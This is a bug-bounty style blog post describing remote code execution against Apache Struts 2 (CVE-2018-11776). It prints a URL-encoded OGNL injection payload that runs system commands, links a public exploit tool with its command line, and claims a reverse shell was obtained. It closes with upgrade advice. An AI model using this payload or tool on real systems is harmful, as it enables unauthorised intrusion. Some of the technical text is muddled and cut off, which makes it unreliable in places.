Apache Struts-2 Remote Code Execution CVE-2018–11776
Hello Guys,
Today I am going to tell you about my finding on a web based application and it is a very well known vulnerability found on Apache Struts-2 RCE (Remote Code Execution).
History Of Apache Struts-2 :-
Apache struts is one of the popular open source framework and highly used by banks and government organizations . Modern, clean, elegant but security wise struts is not having a good time. Older version happens to affect all the versions of the struts REST plugin and also it have found to impact several fortune companies. This exploit for the same have been published and a lot of web applications were getting exploited in massive way.
How I Started :-
As I was hunting on few websites and I came across this link and during my Recon process I came to know that it was vulnerable for Apache Struts-2 just to reconfirm and get a proper detail of the struts I used an online tool named as Contrast. I need to give the URL to the tool and it gave me back the whole details of the Apache struts and also with the proper parameter for the same.
Then after getting the proper parameter I tried to check those parameters on burpsuite with some payloads.
${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22whoami%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23screen%3d%23context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’).getWriter(),%23screen.println(%23d),%23screen.close()}”>test.action?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22netstat%22,%22-an%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java
Then complete the vulnerability trigger by sending a malicious velocity template via GET/POST request with custom velocity template parameter in a specially crafted request, leading to RCE
I used this payload on the generated parameters and YES it gave a proper results.
After googling few links on github I got an exploit available on the same vulnerability which was prompting for the RCE itself. Github Here.
We can use the docker build for the Apache struts and can add custom actions on it. I followed as the programmer has suggested in his exploit.
Setting up to gain reverse shell :-
1. After doing some google search I came across an python code to gain reverse shell on that parameter.2. Just by some modification in the python code I was able to get the reverse shell.3. Here is the python code.https://github.com/mazen160/struts-pwn_CVE-2018-117764. Commands:-python struts-pwn.py --url 'http://example.com/demo/struts2-showcase/index.action'5. Then YES I got an reverse shell for the same.
How to Mitigate :-
All Apache customers should upgrade to the latest version and demploy security patches within 24 hours of availability.
If you are running … Upgrade to…
Struts 2.3.x | Struts 2.3.35
Struts 2.5.x | Struts 2.5.17
That’s all to get an RCE on vulnerable Apache Struts 2, You can read more on on it via following CVE ID.
Anyways it was FUN one, Thanks for reading.
You can Connect with me :-
Twitter :- https://twitter.com/imsushantkamble
Linkedin :- https://in.linkedin.com/in/iamsushantkamble
Facebook :- https://www.facebook.com/iamsushantkamble/
